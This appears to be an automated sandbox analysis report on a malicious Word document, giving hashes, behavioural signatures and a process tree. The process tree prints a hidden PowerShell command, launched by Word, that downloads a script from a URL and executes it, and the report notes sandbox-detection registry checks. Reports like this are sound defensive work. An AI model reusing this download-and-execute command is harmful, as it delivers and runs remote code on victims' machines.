Analysis
-
max time kernel
139s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03/11/2024, 21:08
Behavioral task
behavioral1
Sample
9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315.doc
Resource
win10v2004-20241007-en
General
-
Target
9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315.doc
-
Size
29KB
-
MD5
ac9318d0e8db68d68897f7b226e17386
-
SHA1
96a6eadd0779bfbf47b3a1a3a21c6841faa7279e
-
SHA256
9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315
-
SHA512
c36009ed76e35a43401b2058060d6d4297a74f7ee98ba580cb4be6725c72b4662d043fcfabe073f3e561aa607835a44bfcca2dc5969777ce557fb0e22f2639a9
-
SSDEEP
192:5EO0lLZEvA+6/6r8px8SmvowzxHq30wa6Y6P0tPBxV05JB8aY:a/8iS8px8SMDHgBctK5J
Malware Config
Extracted
http://127.0.0.1:8000/arquivos/windows.txt
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 1364 620 powershell.exe 83 -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1364 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 620 WINWORD.EXE 620 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1364 powershell.exe 1364 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1364 powershell.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 620 WINWORD.EXE 620 WINWORD.EXE 620 WINWORD.EXE 620 WINWORD.EXE 620 WINWORD.EXE 620 WINWORD.EXE 620 WINWORD.EXE 620 WINWORD.EXE -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 620 wrote to memory of 1364 620 WINWORD.EXE 87 PID 620 wrote to memory of 1364 620 WINWORD.EXE 87
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:620 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -w hidden -noninteractive "IEX((new-object net.webclient).downloadstring('http://127.0.0.1:8000/arquivos/windows.txt'))"2⤵
- Process spawned unexpected child process
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1364
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
16B
MD5d29962abc88624befc0135579ae485ec
SHA1e40a6458296ec6a2427bcb280572d023a9862b31
SHA256a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA5124311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize3KB
MD561b343870852ccc0e70c8d8c3bb4cc8c
SHA1c0dcaee03722a93eab2fcfd618392bb33b5c84df
SHA2563869ac37373af3706ac20ffa74d1de3a9bf15af52e7e9cb0a2374fca22cdc261
SHA5121045cc8cf850a807ab9539e714cdeb7750b8da5751d40a634934845aec2094069a8a1c43c888c401424733b43c6d8227d2f7f478b9bdd79bf668ee3891f28b2f